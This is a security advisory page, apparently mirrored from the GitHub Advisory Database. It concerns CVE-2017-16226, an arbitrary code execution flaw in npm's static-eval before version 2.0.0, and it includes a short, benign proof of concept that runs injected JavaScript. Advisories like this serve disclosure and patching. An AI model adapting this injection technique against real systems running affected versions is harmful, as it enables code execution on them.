Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTVtanctNmpyaC1odmZx
Sandbox Breakout / Arbitrary Code Execution in static-eval
Affected versions of static-eval
pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
Proof of concept
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id
Recommendation
Update to version 2.0.0 or later.
Permalink: https://github.com/advisories/GHSA-5mjw-6jrh-hvfqJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTVtanctNmpyaC1odmZx
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 6 years ago
Updated: over 1 year ago
EPSS Percentage: 0.01563
EPSS Percentile: 0.86871
Identifiers: GHSA-5mjw-6jrh-hvfq, CVE-2017-16226
References:
- https://nvd.nist.gov/vuln/detail/CVE-2017-16226
- https://github.com/substack/static-eval/pull/18
- https://github.com/advisories/GHSA-5mjw-6jrh-hvfq
- https://maustin.net/articles/2017-10/static_eval
- https://www.npmjs.com/advisories/548
Blast Radius: 0.0
Affected Packages
npm:static-eval
Dependent packages: 109Dependent repositories: 132,071
Downloads: 14,077,262 last month
Affected Version Ranges: < 2.0.0
Fixed in: 2.0.0
All affected versions: 0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1
All unaffected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1